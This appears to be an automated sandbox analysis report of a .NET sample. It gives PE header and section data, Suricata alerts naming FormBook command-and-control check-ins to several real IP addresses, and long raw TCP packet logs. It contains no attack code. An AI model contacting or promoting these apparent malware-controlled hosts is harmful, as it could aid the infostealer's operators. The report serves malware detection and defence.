                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa9cd00x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x10f8.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000xa7d280xa7e005878ed2e53aacc2ad728c430c19f610dFalse0.9465064803611318data7.890776799320837IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc0xaa0000x10f80x12007275dfe3a6a39abb47dd1ca3367cfad7False0.7790798611111112data6.814429866663682IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0xac0000xc0x200fb9b437d692be392c9f2549a437f0967False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0xaa0c80xc92PNG image data, 224 x 224, 8-bit/color RGBA, non-interlaced0.9608452454940957
                        RT_GROUP_ICON0xaad6c0x14data1.15
                        RT_VERSION0xaad900x364data0.4412442396313364

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-09-09T04:51:33.457358+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44974182.221.128.18380TCP
                        2024-09-09T04:51:57.333525+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449743217.160.0.12780TCP
                        2024-09-09T04:51:59.892864+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449744217.160.0.12780TCP
                        2024-09-09T04:52:02.552406+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449745217.160.0.12780TCP
                        2024-09-09T04:52:04.971654+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449746217.160.0.12780TCP
                        2024-09-09T04:52:10.809816+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974785.159.66.9380TCP
                        2024-09-09T04:52:13.357463+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974885.159.66.9380TCP
                        2024-09-09T04:52:15.900214+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974985.159.66.9380TCP
                        2024-09-09T04:52:18.546634+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44975085.159.66.9380TCP
                        2024-09-09T04:52:24.881361+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975154.179.173.6080TCP
                        2024-09-09T04:52:27.486647+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975254.179.173.6080TCP
                        2024-09-09T04:52:30.067218+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975354.179.173.6080TCP
                        2024-09-09T04:52:32.580881+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44975454.179.173.6080TCP
                        2024-09-09T04:52:38.628754+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449755162.0.213.9480TCP
                        2024-09-09T04:52:41.191892+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449756162.0.213.9480TCP
                        2024-09-09T04:52:43.748193+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449757162.0.213.9480TCP
                        2024-09-09T04:52:46.258157+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449758162.0.213.9480TCP
                        2024-09-09T04:52:51.874986+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497593.33.130.19080TCP
                        2024-09-09T04:52:54.426237+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497603.33.130.19080TCP
                        2024-09-09T04:52:56.973656+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497613.33.130.19080TCP
                        2024-09-09T04:52:59.535259+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497623.33.130.19080TCP
                        2024-09-09T04:53:05.038781+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976313.248.169.4880TCP
                        2024-09-09T04:53:07.589600+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976413.248.169.4880TCP
                        2024-09-09T04:53:10.141285+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976513.248.169.4880TCP
                        2024-09-09T04:53:12.697406+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44976613.248.169.4880TCP
                        2024-09-09T04:53:18.391239+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449767185.134.245.11380TCP
                        2024-09-09T04:53:20.935573+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449768185.134.245.11380TCP
                        2024-09-09T04:53:23.485548+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449769185.134.245.11380TCP
                        2024-09-09T04:53:26.012494+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449770185.134.245.11380TCP
                        2024-09-09T04:53:32.245544+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449771103.42.108.4680TCP
                        2024-09-09T04:53:34.811568+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449772103.42.108.4680TCP
                        2024-09-09T04:53:37.364123+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449773103.42.108.4680TCP
                        2024-09-09T04:53:39.898339+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449774103.42.108.4680TCP
                        2024-09-09T04:53:54.399966+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977538.55.112.7080TCP
                        2024-09-09T04:53:56.942945+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977638.55.112.7080TCP
                        2024-09-09T04:53:59.488015+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977738.55.112.7080TCP
                        2024-09-09T04:54:02.019450+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44977838.55.112.7080TCP
                        2024-09-09T04:54:16.181262+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449779162.240.81.1880TCP
                        2024-09-09T04:54:18.700631+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449780162.240.81.1880TCP
                        2024-09-09T04:54:21.251151+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449781162.240.81.1880TCP
                        2024-09-09T04:54:23.800670+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449782162.240.81.1880TCP
                        2024-09-09T04:54:30.364349+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978354.183.209.21080TCP
                        2024-09-09T04:54:32.915872+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978454.183.209.21080TCP
                        2024-09-09T04:54:35.459872+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978554.183.209.21080TCP
                        2024-09-09T04:54:57.868388+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44978654.183.209.21080TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 9, 2024 04:51:32.795205116 CEST4974180192.168.2.482.221.128.183
                        Sep 9, 2024 04:51:32.800015926 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:32.800103903 CEST4974180192.168.2.482.221.128.183
                        Sep 9, 2024 04:51:32.806587934 CEST4974180192.168.2.482.221.128.183
                        Sep 9, 2024 04:51:32.811366081 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:33.457263947 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:33.457279921 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:33.457324982 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:33.457340002 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:33.457354069 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:33.457357883 CEST4974180192.168.2.482.221.128.183
                        Sep 9, 2024 04:51:33.457365036 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:33.457386017 CEST4974180192.168.2.482.221.128.183
                        Sep 9, 2024 04:51:33.457386971 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:33.457397938 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:33.457487106 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:33.457524061 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:33.457571983 CEST4974180192.168.2.482.221.128.183
                        Sep 9, 2024 04:51:33.457591057 CEST4974180192.168.2.482.221.128.183
                        Sep 9, 2024 04:51:33.457603931 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:33.457645893 CEST4974180192.168.2.482.221.128.183
                        Sep 9, 2024 04:51:33.461874008 CEST4974180192.168.2.482.221.128.183
                        Sep 9, 2024 04:51:33.467088938 CEST804974182.221.128.183192.168.2.4
                        Sep 9, 2024 04:51:56.678713083 CEST4974380192.168.2.4217.160.0.127
                        Sep 9, 2024 04:51:56.683594942 CEST8049743217.160.0.127192.168.2.4
                        Sep 9, 2024 04:51:56.683675051 CEST4974380192.168.2.4217.160.0.127
                        Sep 9, 2024 04:51:56.694547892 CEST4974380192.168.2.4217.160.0.127
                        Sep 9, 2024 04:51:56.699374914 CEST8049743217.160.0.127192.168.2.4
                        Sep 9, 2024 04:51:57.333204031 CEST8049743217.160.0.127192.168.2.4
                        Sep 9, 2024 04:51:57.333370924 CEST8049743217.160.0.127192.168.2.4
                        Sep 9, 2024 04:51:57.333524942 CEST4974380192.168.2.4217.160.0.127
                        Sep 9, 2024 04:51:58.207866907 CEST4974380192.168.2.4217.160.0.127
                        Sep 9, 2024 04:51:59.225975990 CEST4974480192.168.2.4217.160.0.127
                        Sep 9, 2024 04:51:59.230854034 CEST8049744217.160.0.127192.168.2.4
                        Sep 9, 2024 04:51:59.230942011 CEST4974480192.168.2.4217.160.0.127
                        Sep 9, 2024 04:51:59.241091967 CEST4974480192.168.2.4217.160.0.127
                        Sep 9, 2024 04:51:59.252284050 CEST8049744217.160.0.127192.168.2.4
                        Sep 9, 2024 04:51:59.892699003 CEST8049744217.160.0.127192.168.2.4
                        Sep 9, 2024 04:51:59.892760038 CEST8049744217.160.0.127192.168.2.4
                        Sep 9, 2024 04:51:59.892863989 CEST4974480192.168.2.4217.160.0.127
                        Sep 9, 2024 04:52:00.754745960 CEST4974480192.168.2.4217.160.0.127
                        Sep 9, 2024 04:52:01.773031950 CEST4974580192.168.2.4217.160.0.127
                        Sep 9, 2024 04:52:01.784255028 CEST8049745217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:01.784332037 CEST4974580192.168.2.4217.160.0.127
                        Sep 9, 2024 04:52:01.794002056 CEST4974580192.168.2.4217.160.0.127
                        Sep 9, 2024 04:52:01.798907042 CEST8049745217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:01.798914909 CEST8049745217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:01.798943996 CEST8049745217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:01.798968077 CEST8049745217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:01.799021006 CEST8049745217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:01.799029112 CEST8049745217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:01.799071074 CEST8049745217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:01.799078941 CEST8049745217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:01.799087048 CEST8049745217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:02.552328110 CEST8049745217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:02.552346945 CEST8049745217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:02.552406073 CEST4974580192.168.2.4217.160.0.127
                        Sep 9, 2024 04:52:03.302032948 CEST4974580192.168.2.4217.160.0.127
                        Sep 9, 2024 04:52:04.319804907 CEST4974680192.168.2.4217.160.0.127
                        Sep 9, 2024 04:52:04.325278997 CEST8049746217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:04.325371027 CEST4974680192.168.2.4217.160.0.127
                        Sep 9, 2024 04:52:04.331119061 CEST4974680192.168.2.4217.160.0.127
                        Sep 9, 2024 04:52:04.336579084 CEST8049746217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:04.971285105 CEST8049746217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:04.971479893 CEST8049746217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:04.971653938 CEST4974680192.168.2.4217.160.0.127
                        Sep 9, 2024 04:52:04.974248886 CEST4974680192.168.2.4217.160.0.127
                        Sep 9, 2024 04:52:04.978988886 CEST8049746217.160.0.127192.168.2.4
                        Sep 9, 2024 04:52:10.100596905 CEST4974780192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:10.105753899 CEST804974785.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:10.105811119 CEST4974780192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:10.115622997 CEST4974780192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:10.120968103 CEST804974785.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:10.809689045 CEST804974785.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:10.809770107 CEST804974785.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:10.809815884 CEST4974780192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:11.629774094 CEST4974780192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:12.648866892 CEST4974880192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:12.654280901 CEST804974885.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:12.654369116 CEST4974880192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:12.673564911 CEST4974880192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:12.683562040 CEST804974885.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:13.357369900 CEST804974885.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:13.357389927 CEST804974885.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:13.357462883 CEST4974880192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:14.176892042 CEST4974880192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:15.194829941 CEST4974980192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:15.199804068 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.199891090 CEST4974980192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:15.215871096 CEST4974980192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:15.220882893 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.220894098 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.220901966 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.220918894 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.220927954 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.220941067 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.220956087 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.220964909 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.220973969 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.900119066 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.900135040 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.900213957 CEST4974980192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:16.723527908 CEST4974980192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:17.742618084 CEST4975080192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:17.823996067 CEST804975085.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:17.824071884 CEST4975080192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:17.829900980 CEST4975080192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:17.834712982 CEST804975085.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:18.546174049 CEST804975085.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:18.546567917 CEST804975085.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:18.546633959 CEST4975080192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:18.549006939 CEST4975080192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:18.553822041 CEST804975085.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:23.974786043 CEST4975180192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:23.979614973 CEST804975154.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:23.979696989 CEST4975180192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:23.990776062 CEST4975180192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:23.995651960 CEST804975154.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:24.881259918 CEST804975154.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:24.881282091 CEST804975154.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:24.881361008 CEST4975180192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:25.504765034 CEST4975180192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:26.522943974 CEST4975280192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:26.528764963 CEST804975254.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:26.529793978 CEST4975280192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:26.538639069 CEST4975280192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:26.544229031 CEST804975254.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:27.486562967 CEST804975254.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:27.486582994 CEST804975254.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:27.486646891 CEST4975280192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:28.051666975 CEST4975280192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:29.070429087 CEST4975380192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:29.075320005 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.079826117 CEST4975380192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:29.091778040 CEST4975380192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:29.096688032 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096708059 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096797943 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096807957 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096899033 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096973896 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096982956 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096991062 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.097002983 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:30.018930912 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:30.067218065 CEST4975380192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:30.258212090 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:30.258306026 CEST4975380192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:30.601783991 CEST4975380192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:31.618526936 CEST4975480192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:31.623509884 CEST804975454.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:31.623631954 CEST4975480192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:31.632414103 CEST4975480192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:31.637268066 CEST804975454.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:32.576193094 CEST804975454.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:32.576261997 CEST804975454.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:32.580881119 CEST4975480192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:32.580881119 CEST4975480192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:32.587687016 CEST804975454.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:37.957951069 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:37.962783098 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:37.962850094 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:37.976773024 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:37.981564999 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628638029 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628658056 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628669024 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628680944 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628691912 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628703117 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628714085 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628727913 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628753901 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:38.628851891 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628864050 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628875971 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:38.633610010 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.633620977 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.633631945 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.633639097 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:38.633642912 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.635078907 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:38.732472897 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.732542038 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.732671022 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.734437943 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:39.491725922 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:40.507652998 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:40.512533903 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:40.512605906 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:40.523871899 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:40.528773069 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191790104 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191812038 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191823006 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191840887 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191854000 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191865921 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191879034 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191890001 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191891909 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:41.191936970 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:41.191936970 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:41.192078114 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.192154884 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.193968058 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:41.196687937 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.196707964 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.196799040 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:41.196813107 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.239101887 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:41.289599895 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.289619923 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.289732933 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.289839983 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:42.036129951 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.054761887 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.060606003 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.063828945 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.081810951 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.086858034 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086870909 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086888075 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086895943 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086904049 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086911917 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086927891 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086936951 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086945057 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748126030 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748162985 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748173952 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748189926 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748193026 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.748203039 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748214006 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748223066 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.748231888 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748243093 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748248100 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.748255968 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748266935 CEST8049757162.0.213.94192.168.2.4
